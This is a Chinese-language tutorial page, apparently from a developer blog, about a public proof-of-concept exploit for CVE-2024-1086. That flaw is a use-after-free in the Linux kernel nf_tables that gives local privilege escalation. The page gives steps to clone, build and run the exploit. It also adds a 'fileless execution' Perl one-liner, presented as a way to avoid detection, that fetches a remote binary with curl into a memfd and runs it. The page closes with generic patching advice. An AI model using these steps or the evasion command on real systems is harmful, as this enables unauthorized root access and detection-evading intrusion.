CVE-2024-1086 开源项目教程

CVE-2024-1086 开源项目教程

CVE-2024-1086Universal local privilege escalation Proof-of-Concept exploit for CVE-2024-1086, working on most Linux kernels between v5.14 and v6.6, including Debian, Ubuntu, and KernelCTF. The success rate is 99.4% in KernelCTF images.项目地址:https://gitcode.com/gh_mirrors/cv/CVE-2024-1086

项目介绍

CVE-2024-1086 是一个针对 Linux 内核的本地权限提升漏洞的 PoC(概念验证)利用工具。该漏洞存在于 Linux 内核的 netfilter: nf_tables 组件中,通过利用 nft_verdict_init() 函数中的 use-after-free 漏洞,可以实现本地权限提升。此项目适用于大多数 Linux 内核版本,包括 Debian、Ubuntu 和 KernelCTF,成功率高达 99.4%。

项目快速启动

克隆项目

首先,克隆项目到本地:

git clone https://github.com/Notselwyn/CVE-2024-1086.git

编译项目

进入项目目录并编译:

cd CVE-2024-1086
make

运行利用工具

编译完成后,运行利用工具:

./exploit

文件less执行(可选)

在某些渗透测试场景中,可能需要避免检测。可以使用 Perl 脚本进行文件less执行:

perl -e 'require qw/syscall ph/; my $fd = syscall(SYS_memfd_create, $fn, 0); system "curl https://example.com/exploit -s >&$fd"; exec ["/proc/$$/fd/$fd"], "memfd";'

应用案例和最佳实践

应用案例

CVE-2024-1086 主要用于教育和研究目的,帮助安全研究人员和开发人员理解内核漏洞及其潜在影响。例如,安全团队可以使用此工具进行内核漏洞的测试和验证,以确保系统的安全性。

最佳实践

  1. 定期更新内核:确保使用最新版本的内核,以避免已知漏洞。
  2. 安全审计:定期对系统进行安全审计,检查是否存在潜在的安全风险。
  3. 权限管理:严格管理系统权限,避免不必要的权限提升。

典型生态项目

相关项目

  1. Linux 内核安全补丁:关注 Linux 内核官方发布的补丁,及时更新以修复已知漏洞。
  2. 安全工具集:使用如 Metasploit、Nmap 等安全工具进行系统安全评估和漏洞扫描。
  3. 社区论坛:参与如 KernelCTF 等社区论坛,与其他安全研究人员交流和分享经验。

通过以上步骤和建议,您可以有效地利用 CVE-2024-1086 项目进行安全研究和实践。

CVE-2024-1086Universal local privilege escalation Proof-of-Concept exploit for CVE-2024-1086, working on most Linux kernels between v5.14 and v6.6, including Debian, Ubuntu, and KernelCTF. The success rate is 99.4% in KernelCTF images.项目地址:https://gitcode.com/gh_mirrors/cv/CVE-2024-1086

  • 6
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

石淞畅Oprah

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值